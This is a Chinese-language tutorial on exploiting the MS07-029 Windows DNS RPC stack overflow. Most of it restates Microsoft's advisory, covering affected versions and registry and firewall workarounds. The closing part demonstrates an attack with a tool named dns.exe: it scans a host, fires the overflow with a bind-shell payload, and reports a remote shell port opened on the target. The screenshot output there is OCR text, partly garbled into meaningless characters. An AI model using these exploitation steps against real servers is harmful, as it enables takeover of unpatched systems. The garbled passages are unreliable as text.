Ms07-029遠程溢出漏洞利用

1、Ms07-029 遠程溢出漏洞利用Win dows DNS RPC接口中的漏洞可能允許遠程執(zhí)行代碼（935966）發(fā)布日期： 五月 8, 2007 | 更新日期： 六月 6, 2007 本文的目標讀者： 使用 Microsoft Windows 的客戶 漏洞的影響： 遠程執(zhí)行代碼最高嚴重等級： 嚴重建議： 客戶應立即應用此更新受影響的軟件 ：? Microsoft Windows 2000 Server Service Pack 4 下載此更新? Microsoft Windows Server 2003 Service Pack 1Microsoft Windows Server 2003

2、Service Pack 2? Microsoft Windows Server 2003 SP1 （用于基于 Itanium 的系統(tǒng)）Microsoft Windows Server 2003 SP2 （用于基于 Itanium 的系統(tǒng)） ? Microsoft Windows Server 2003 x64 EditionMicrosoft Windows Server 2003 x64 Edition Service Pack 2 不受影響的軟件 ：? Microsoft Windows 2000 Professional Service Pack 4? Microsoft Window

3、s XP Service Pack 2? Microsoft Windows XP Professional x64 EditionMicrosoft Windows XP Professional x64 Edition Service Pack 2? Windows VistaWindows Vista x64 Edition 造成漏洞的原因是什么？Windows 域名系統(tǒng) (DNS) 服務器服務的遠程過程調用 (RPC) 管理接 口中存在基于堆棧的緩沖區(qū)溢出 什么是遠程過程調用 (RPC) ？遠程過程調用 (RPC) 是一種協(xié)議， 程序可使用該協(xié)議向網(wǎng)絡中另一臺 計算機上的程序請求服務。

4、 由于使用 RPC 的程序不必了解支持通信 的網(wǎng)絡協(xié)議的情況，因此 RPC 提高了程序的互操作性。 在 RPC 中， 發(fā)出請求的程序是客戶程序，而提供服務的程序是服務器。 攻擊者如何利用此漏洞？在所有受支持的 Windows 服務器版本上運行 DNS 服務器服務的服務 器上，匿名攻擊者可能通過向受影響的系統(tǒng)發(fā)送特制的 RPC 數(shù)據(jù)包來 嘗試利用該漏洞。 該漏洞可能允許攻擊者在域名系統(tǒng)服務器服務 (默 認情況下作為“本地系統(tǒng)”運行)的安全上下文中運行代碼。 受此漏洞威脅最大的系統(tǒng)有哪些？DNS服務器、域控制器和小型企業(yè)服務器受到的威脅最大。如果這些系統(tǒng)被放置到不受信任的網(wǎng)絡， 而該網(wǎng)絡允許未經(jīng)請

5、求的 PRC 管理流 量，則這些系統(tǒng)可能面臨更大風險。不過，防火墻最佳做法強烈反對 這樣做此漏洞的影響范圍有多大？這是一個遠程執(zhí)行代碼漏洞。 成功利用此漏洞的攻擊者可以遠程完全 控制受影響的系統(tǒng)。 攻擊者可隨后安裝程序； 查看、更改或刪除數(shù)據(jù)； 或者創(chuàng)建擁有完全用戶權限的新帳戶。變通方法 ：? 通過注冊表項設置禁止通過 DNS 服務器的 RPC 功能進行遠程管 理。注意 如果注冊表編輯器使用不當， 可能會導致嚴重的問題， 可能必須 重新安裝操作系統(tǒng)。 Microsoft 不保證能夠解決因注冊表編輯器使用 不當而導致的問題。 使用注冊表編輯器的風險由您自己承擔。 有關如何編輯注冊表的信息， 請查

6、看注冊表編輯器 (Regedit.exe) 中 的“更改項和值”幫助主題，或查看 regedit.exe 中的“在注冊表中 添加和刪除信息”和“編輯注冊表數(shù)據(jù)”幫助主題。注意 我們建議在編輯注冊表之前先對其進行備份1. 在“開始”菜單上， 單擊“運行”，然后鍵入 Regedit 并按 Enter 。2. 定位到以下注冊表位置：“ HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesDNSP arameters ”。3. 在“編輯”菜單上，選擇“新建”，然后單擊“ DWOR值”。4. 在突出顯示“新值 #1 ”的位置，鍵入 RpcProtocol 作

7、為值名稱， 然后按 Enter 。5. 雙擊新創(chuàng)建的值，然后將值數(shù)據(jù)更改為“ 4” (不帶引號) 。6. 重新啟動 DNS 服務，更改才會生效如何撤消變通辦法： 要撤消變通辦法，請執(zhí)行下列步驟：1. 在“開始” 菜單上， 單擊“運行”，然后鍵入 Regedit 并按 Enter 。2. 定位到以下注冊表位置：“ HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesDNSP arameters ”。3. 選擇注冊表項 RpcProtocol4. 右鍵單擊 RpcProtocol 注冊表項，然后選擇“刪除” 。5. 重新啟動 DNS 服務，更改才會生效

8、。RpcProtocol 注冊表項值以上使用的值“ 4”會將DNS RPC接口限制為僅本地過程調用（LPC）。這樣做僅允許本地管理。列值適用于 RpcProtocol 注冊表項：? 0x1- 此 值 對 應 于DNS_RPC_USE_TCPIP #define4#DNS RPC USE NAMED PIPE0的設置 ? 0x2 - 此值對應于 DNS RPC USE NAMED PI的設置 ?0x4 - 此值對應于 DNS RPC USE LP的設置 ?禁止通過PRC進行遠程管理您可以通過設置注冊表中的值來將 DNS 服務器的管理接口重新配置RPC 通信。Microsoft為僅接受LPC。其他

9、注冊表值將以不同的方式修改或禁用 有關 RpcProtocol 注冊表項的詳細信息，請參閱下列TechNet 文章。? 將值設置為 4 可緩解利用該漏洞的遠程嘗試? 將值設置為 0 將禁用所有 DNS RPC 功能，并防止本地和遠程嘗試 利用該漏洞。 變通辦法的影響： 將注冊表值設置為 4 將禁止使用 RPC 或 WMI 遠 程管理和配置 DNS 服務器功能。 DNS 管理工具無法遠程工作。 通過 終端服務執(zhí)行的本地管理和遠程管理仍然可用于管理 DNS 服務器配 置。如果DNS管理MMC管理單元 DNSCMD.exe和DNS WMI提供程序從 服務器以本地方式運行，則您仍能夠使用它們。將注冊表

10、值設置為 0 將禁用所有 DNS RPC 管理功能，包括本地管理 和配置。如果被管理的服務器的計算機名稱為 15 個字符，并且按其計算機名 稱選中，則 DNS 服務器本地管理和配置可能無法工作。 為避免此問 題，請在 DNS 管理工具中使用被管理的計算機的完全限定的域名 (FQDN)。? 在防火墻處阻止以下內容：阻止 TCP 和 UDP 端口 445 和 139 以及大于 1024 的端口上所有未 經(jīng)請求的入站流量。Windows DNS 的 RPC 接口可以綁定到大于 1024 的端口。當大多數(shù)RPC端口綁定在1024到5000范圍之間發(fā)生時，則RPC接口可能綁 定到更高的無限制的端口號。

11、將其阻止在防火墻處， 有助于保護位于 防火墻后面的系統(tǒng)免受利用此漏洞進行的攻擊。 我們建議阻止所有來 自 Internet 的未經(jīng)請求的入站通信，以幫助防止可能使用其他端口 進行的攻擊。 有關 PRC 使用的端口的詳細信息， 請訪問以下網(wǎng)站。 要 在保留 DNS 管理功能的同時阻止所有未經(jīng)請求的 RPC 請求，請參閱 Microsoft 知識庫文章 555381 。 注意攻擊者需要使用有效的用戶名和密碼進行身份驗證，才能使用端 口 139 或 445 利用該漏洞。變通辦法的影響： 使用 RPC 來遠程管理 DNS 服務器功能這一行為將 被禁用。 DNS 管理工具無法遠程工作。 通過終端服務執(zhí)行

12、的本地和 遠程管理仍然可用于管理 DNS 服務器配置。這包括DNS管理MMC管理單元、DNSCMD.exe和DNSWMI提供程序。 使用受影響的端口的應用程序或組件可能丟失其他管理和控制功能。阻止端口 445 將使得計算機無法通過 SMB 連接到服務器，并且服務 器無法訪問共享的網(wǎng)絡文件夾。 依賴于 SMB 進行連接的管理工具將 無法連接到服務器。以上是關于這個漏洞的介紹，接下來，就開始演示溢出的過程， 我們所用到的工具是 dns.exe 。第一步，打開 cmd 把路徑轉到工具所在的目錄， 輸入 dns.exe 可 以看到關于這個軟件的幫助，如下圖：if if" i n =3n Pi

13、*- i v i p i -=： i * i -. i>- i =I -Tip-,ti q i -i ri - +*! i i, £*嚴第二步，就是dns.exe這個工具掃描一下網(wǎng)絡中有 dns服務的主機，這里還可以看到對方主機的系統(tǒng)版本，如下圖“ C:WIND0WSsys1 em32kmcl.exeC:>dns _ exe s 10_0_ 0 _1-1 - UnQuote It 006 RC1 - ENJOY - DRIUE WITH CAUTION- Anti-dep vevsion (* - bind shell payload selected <317&g

14、t; port 21100 addr ：0«0.0.0105110.0-0.11051 ；Uulnerabilityscann inOS:uindow第三步，我們就可以開始進行溢出了，這是溢出成功的界面，提示我們可以連接對方的1100端口，見下圖 C: W INDOWS Is ystem 3 2 V: rn d. e xeC：>dns.exe -t2000a11 10.0.0.1 1051UnQuotelt 00& BC1 - ENJOV - DRI HE UITH CAUTION- Anti dep vers ion bind shell payload se lected <317 bites > poi?t ：1100 addp：tl_0.0. t) Connection to target host tcp port establishedSuccessfully bound to the uulnerable DCEBPC InterfaceOS Fingerprint 1'csult: Llindous 2006A11ac 1< sent, checl< port 11